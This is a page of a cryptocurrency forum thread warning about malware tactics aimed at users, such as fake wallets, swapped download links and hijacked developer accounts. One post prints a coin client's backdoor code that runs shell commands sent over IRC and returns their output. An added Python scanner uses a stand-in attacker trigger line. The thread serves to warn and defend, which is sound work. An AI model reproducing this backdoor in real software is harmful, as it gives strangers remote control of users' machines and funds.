Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 2. (Read 834658 times)

member
Activity: 812
Merit: 13
Crypto bookmaker and casino
Yes, you are right. Most airdrops are not legit and are just a simple strategy employed by hackers to take advantage of the information of airdrop hunters.
It is best to verify the authenticity of an airdrop from the official Telegram of the project before participating.
Thousands of airdrops that are being developed by developers are never legit and, most of the time, they are used to steal data and increase people's vulnerability to hacking without them knowing what they have gotten themselves into. Scammers can decide to create an airdrop allowing innocent people to drop their information to get the airdrop and later use it against them. We should be aware of the different tactics used by scammers.
legendary
Activity: 1372
Merit: 1001
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
    // Fires on any IRC PRIVMSG whose text begins with "! " (vWords[3] == ":!")
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // CRead is a macro for popen(): the rest of the message, starting at
        // vWords[4], is handed to the shell as a command
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            // collect everything the command writes to stdout
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);   // macro for pclose()
            // recover the sender's nick from ":nick!user@host"
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // send the command output back to the sender as a private message
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }
Here is the source code with macros resolved:
Code:
    // Same block with CBuff, CLine, CRead and CFree expanded
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // remote command execution: the tail of the IRC line is run via popen()
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            // collect everything the command writes to stdout
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            // recover the sender's nick from ":nick!user@host"
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // exfiltrate the output to the sender over IRC
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
There is so much malware now, and it is getting more and more sophisticated; we need to be wary. Can you share some coin software or some project to keep people alert and stay away, because I think this is something we should all do and share together.
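The quoted backdoor works because the dangerous call is hidden behind a #define alias (CRead for popen) and because a single IRC message is enough to trigger it. Below is an added example, not code from the post above or from any coin project, that does two things a reviewer of a "revived" coin client would want: it resolves simple object-like #define chains in C/C++ source and flags any call that ends up at a process-spawning function, and it walks through what the quoted dispatch logic would execute for a given raw IRC line. The list of flagged functions, the regex-based macro handling and the assumption that the client splits the IRC line on single spaces are mine; the sample source and IRC lines are constructed for illustration.

```python
"""Added example (not from the forum post or any coin project): spot
shell-execution calls hidden behind #define aliases in C/C++ source and
show what an IRC command backdoor of the kind quoted above would run.
The sample source and IRC lines below are constructed for illustration."""
import re

# libc/POSIX and Win32 process-spawning functions worth flagging in a
# wallet or miner code base, whatever name they are called by (assumed list).
DANGEROUS = {
    "popen", "_popen", "system", "execl", "execlp", "execle", "execv",
    "execvp", "execve", "posix_spawn", "ShellExecuteA", "ShellExecuteW",
    "CreateProcessA", "CreateProcessW", "WinExec",
}

# Object-like macro only: "#define NAME replacement" (no parameter list).
DEFINE_RE = re.compile(r"^\s*#\s*define\s+(\w+)\s+(\S+)\s*$", re.MULTILINE)
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")


def resolve_aliases(source: str) -> dict:
    """Map each macro alias (following chains like A -> B -> popen) to the
    dangerous function it ultimately expands to."""
    defines = dict(DEFINE_RE.findall(source))
    resolved = {}
    for alias in defines:
        target, seen = alias, set()
        while target in defines and target not in seen:   # guard against cycles
            seen.add(target)
            target = defines[target]
        if target in DANGEROUS:
            resolved[alias] = target
    return resolved


def find_shell_calls(source: str) -> list:
    """Return (line_no, name_as_written, real_function) for each call to a
    dangerous function, whether written directly or through an alias."""
    aliases = resolve_aliases(source)
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):        # skip the #define lines themselves
            continue
        for m in CALL_RE.finditer(line):
            name = m.group(1)
            if name in DANGEROUS:
                hits.append((lineno, name, name))
            elif name in aliases:
                hits.append((lineno, name, aliases[name]))
    return hits


def extract_command(irc_line: str):
    """Mimic the quoted dispatch: split the raw line on spaces (assumption
    about how the client builds vWords) and return (sender_nick, command)
    if the line would trigger the backdoor, otherwise None."""
    words = irc_line.split(" ")
    if len(words) < 5:
        return None
    if words[1] != "PRIVMSG" or words[3] != ":!" or len(words[0]) <= 1:
        return None
    # popen(strstr(strLine, vWords[4])): the command is the tail of the line
    # starting at the first occurrence of the fifth word.
    command = irc_line[irc_line.find(words[4]):]
    # strlcpy(pszName, vWords[0] + 1) then cut at '!': ":nick!user@host" -> "nick"
    nick = words[0][1:].split("!", 1)[0]
    return nick, command


# Constructed sample: the quoted snippet plus the macros that hide popen().
SAMPLE_SOURCE = r'''
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        CFree(buf);
    }
}
'''

TRIGGER_LINE = ":attacker!u@evil.example PRIVMSG #coinchan :! uname -a"   # constructed
NORMAL_LINE = ":bob!u@home.example PRIVMSG #coinchan :hello everyone"      # constructed

if __name__ == "__main__":
    for lineno, name, real in find_shell_calls(SAMPLE_SOURCE):
        print(f"line {lineno}: {name}() -> {real}()")
    print(extract_command(TRIGGER_LINE))   # ('attacker', 'uname -a')
    print(extract_command(NORMAL_LINE))    # None
```

The regex pass only understands object-like macros, so for a real review run the actual preprocessor (for example `gcc -E` on the file) and grep the expanded output for popen, system and the exec family; an alias that survives preprocessing cannot hide from that. The second function shows why this backdoor needs no network listener of its own: anyone who can send a PRIVMSG on the bootstrap channel controls the command, and the reply path carries the output straight back to them.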
legendary
Activity: 3752
Merit: 1864
Hello everyone!
I read this thread, and the question arose: are you really running mining, wallets and so on on a PC/laptop that is a storage of critical information? Seriously?
I believe that if you own more or less significant funds and "work" in this market, then you MUST provide yourself with the conditions of "information hygiene". Ideally, different devices for working with wallets/exchanges, separately for forums, etc., separately for mail/Telegram/Viber, etc., and separately for mining and monitoring.
Antiviruses and other means of protection ALWAYS have relevance with a lag in relation to malicious solutions. First a disease appears, then a medicine for it, and nothing else!
copper member
Activity: 224
Merit: 2
TheStandard
Nowadays, malware infection attempts are very sophisticated, even when you do swaps on PancakeSwap from anonymous coins like VERA. This is a coin where you just need to perform a swap operation to another coin and immediately you will lose all your balance in the wallet. This is a new sophisticated trick that should be warned about; you should be careful of strange coins being transferred to your wallet.
legendary
Activity: 1778
Merit: 1474
🔃EN>>AR Translator🔃
When will the announcement board be without the possibility of making self-moderated announcements? This helps the scammers too much.

This was suggested several times but seems not to be a priority on the admin to-do list. Note that the altcoin board is considered a spam area and the administration seems not to take things seriously here. Not to forget that a user is the first/only one responsible for what he may accept to install onto his device, and those sticky threads at the top of boards are raised flags warning us not to trust anybody and to do enough research on links and software.

My device was increasingly misbehaving last week. I feared that malware had entered the device.

Sometimes there is no way to know if the device is really infected or not. The one and only solution is to move important files to an external hard drive before formatting the device. Always take care if your device is connected to the internet all the time.
member
Activity: 430
Merit: 22
Professional user
When will the announcement board be without the possibility of making self-moderated announcements? This helps the scammers too much.
newbie
Activity: 107
Merit: 0
There are other ways accounts get hacked: there are some fake projects online that request logins just to get in touch with how someone's password looks; hackers try these passwords on other accounts of the victims like their Gmail and blockchain accounts. This point also makes accounts vulnerable to attacks.
newbie
Activity: 1050
Merit: 0
It would have been better if you had listed at least a few of those platforms resulting from the cause of such malware and attacks.
full member
Activity: 574
Merit: 101
Just had my Poloniex account hacked with 2FA enabled. I still don't understand how it is possible. If anyone is interested, can you track for me where the coins ended up? I got lost along the way.

0x96C3262B0a3F5f1348D91C11637f217bf72F8773
0x0db528e73d07e0fae92b1b705e01a1d5627b1cddae8fc2064ffc57bda3b236ef

0x96C3262B0a3F5f1348D91C11637f217bf72F8773
0xd6ea42c2fbd03170b6047b6b6c40211bb1efef0b307677a3b97891e3b302e8d1


Yes, I think that malware is scary because, just like you and the other members said, your account might get hacked, and that is unfortunate because your account might get attacked by the hackers and they can access your information through that hacking.
member
Activity: 180
Merit: 28
There have been many attacks lately through fake private messages on discord servers.
Stay safe, think twice before you download and check three times before you open a new file.

https://bitcointalksearch.org/topic/m.54016299
https://bitcointalksearch.org/topic/m.54060121
https://bitcointalksearch.org/topic/m.54010280
jr. member
Activity: 168
Merit: 2
mada mada dane
Recently I heard of a new malware that operates via public or shared charging ports. I mean, you can get your bank account cleaned out in seconds by merely connecting your phone to a charging port in a public place. How frightening this whole thing is! Wow.

That's pretty scary. I haven't heard the same thing here in my country, but who knows, there might be someone who already experienced this one but wasn't able to report it to the authorities, so there is no news. The most hacking I know of was about people who were robbed by their banks, blaming a glitch in their system.
member
Activity: 242
Merit: 10
Hi Crypto Friends :)
It professed to be my specialist organization and gave me a number to call. I admit I tried to call; however, the ring didn't sound right. It seemed like an old phone. I hung up and rebooted my PC.

If you get that while browsing, you should be able to block it with the NoScript extension for Firefox / your browser. I think rather than a crypto scam, most of the time it's just tech support scammers, and if you see a message with something like "Hello! Your computer has contacted Microsoft support and alerted us that your PC has a virus. Please call -number here-" then you can pretty much safely ignore it. When dealing with crypto, though, it's always a good idea to have a cold / hardware wallet since it's much safer.
sr. member
Activity: 574
Merit: 250
It is not always as easy as you want to believe; today they use many methods to steal cryptocurrencies and not all people are capable of avoiding them. Stealing crypto is very profitable and you don't have much chance of reporting the theft to the police.
jr. member
Activity: 310
Merit: 1
Recently I heard of a new malware that operates via public or shared charging ports. I mean, you can get your bank account cleaned out in seconds by merely connecting your phone to a charging port in a public place. How frightening this whole thing is! Wow.
legendary
Activity: 3136
Merit: 3213
If anybody finds something with malware or bad software, just report it, and you can look in these threads too!

Guide and advice for new Users before you Download anything from the Forum !
Report Malware and Suspicious Links here so Mods can take Action !
jr. member
Activity: 178
Merit: 1
Use of mobile for crypto trading and investment is not safe. There are lots of applications, especially those not authorized by Android, installed on our phones which not only breach our private data but also keep an eye on our financial assets. The more dangerous thing is that they are harder to detect on a mobile phone, as there are many apps installed on our phones.
Recently, my friend lost Ethereum from his wallet and the reason was the applications that work in the background.
Therefore, we should be more vigilant if we do have crypto or other online financial assets on our phone.
newbie
Activity: 8
Merit: 0
Actually, I am very confused now. As you say, the pollution is getting more and more sophisticated; it's hard to avoid it.
I do not know what to do to invest in alts safely.
jr. member
Activity: 35
Merit: 1
I always use antivirus and anti malware as sometimes antivirus doesn't catch the malware or backdoor programs.
jr. member
Activity: 109
Merit: 1
These con artists are continually learning, getting to be more astute and increasingly refined. Be cautious consistently. Download only from authority sites and consistently check where the link will take you.
hero member
Activity: 2968
Merit: 687
It is a never-ending fight, so we must watch out for any new threats, malware and viruses,
and more so if we have our wallets installed on computers
It is indeed a never-ending fight. If there are ways that have already been disclosed and are being avoided or are completely known, these scammers do continue to create new ways to scam or hack people with all possibilities; that's why our own experience and common sense is the main weapon to avoid these things.

never install or download any app from unknown sources
No. 1 basic rule but people do still fail to follow this one.